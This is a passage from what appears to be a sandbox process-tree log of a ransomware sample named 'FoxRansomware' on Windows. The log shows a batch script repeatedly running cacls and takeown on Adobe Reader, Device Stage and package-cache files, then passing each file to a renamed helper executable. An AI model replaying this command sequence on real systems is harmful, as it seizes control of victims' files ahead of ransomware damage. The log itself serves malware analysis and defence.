C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:4988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:2704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:3372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:3432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:3476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:3480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:3976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:2608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:3640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:3872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can03.ths" -nobanner3⤵PID:4068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can03.ths" -nobanner4⤵PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:5360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:3284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:3296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:5292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:5340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:2564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:5456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:5416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:5512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner3⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "superbar.png" -nobanner4⤵PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:5164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "br.gif" -nobanner3⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "br.gif" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:5580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "form_responses.gif" -nobanner3⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "form_responses.gif" -nobanner4⤵PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1876
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_email.gif" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "review_email.gif" -nobanner4⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:2716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
- Modifies file permissions
PID:2072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tr.gif" -nobanner3⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tr.gif" -nobanner4⤵PID:2464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:3024
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:2292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:2208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:2636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:2724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:2680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:2892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:3288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:3992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can.fca" -nobanner3⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can.fca" -nobanner4⤵PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:2916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:3528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa03.ths" -nobanner3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "usa03.ths" -nobanner4⤵PID:4056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:3428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:2768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:4024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:2748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner3⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "background.png" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:4564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:3384
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:4696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab""2⤵PID:4500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\cab1.cab"3⤵PID:4416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cab1.cab" -nobanner3⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "cab1.cab" -nobanner4⤵PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:4548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner3⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "device.png" -nobanner4⤵PID:3656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4560
-
-
-
